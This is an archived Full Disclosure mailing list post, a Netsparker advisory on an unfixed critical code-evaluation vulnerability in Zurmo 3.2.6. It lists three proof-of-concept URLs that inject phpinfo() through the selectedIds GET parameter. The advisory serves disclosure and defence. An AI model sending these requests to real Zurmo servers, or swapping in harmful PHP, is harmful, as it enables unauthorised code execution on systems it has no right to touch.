Full Disclosure mailing list archives
Code Evaluation Vulnerability in Zurmo 3.2.6
From: Daniel Bishtawi <daniel () netsparker com>
Date: Thu, 25 Jul 2019 11:34:28 +0200
Hello, We are informing you about the vulnerabilities in Zurmo 3.2.6. Here are the details: Information -------------------- Advisory by Netsparker Name: Code Evaluation Vulnerability in Zurmo Affected Software: Zurmo Affected Versions: 3.2.6 Homepage: http://zurmo.org Vulnerability: Code Evaluation Severity: Critical Status: Not Fixed Netsparker Advisory Reference: NS-19-007 Technical Details -------------------- URL: http:// {DOMAIN}/zurmo/app/index.php/leads/default/?_=1557483150787&ajax=list-view&Contact_page=&Contact_sort=&selectedIds=phpinfo() Parameter Name : selectedIds Parameter Type: GET Attack Pattern: phpinfo() URL: http:// {DOMAIN}/zurmo/app/index.php/opportunities/?_=1557483204319&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo() Parameter Name : selectedIds Parameter Type: GET Attack Pattern: phpinfo() URL: http:// {DOMAIN}/zurmo/app/index.php/opportunities/default/?_=1557483206340&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo() Parameter Name : selectedIds Parameter Type: GET Attack Pattern: phpinfo() For more information: https://www.netsparker.com/web-applications-advisories/ns-19-007-code-evaluation-in-zurmo/ Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn <https://www.linkedin.com/company/netsparker-ltd> | Facebook <https://facebook.com/netsparker> <https://www.netsparker.com/blog/events/exhibiting-black-hat-usa-2019/> _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Code Evaluation Vulnerability in Zurmo 3.2.6 Daniel Bishtawi (Jul 26)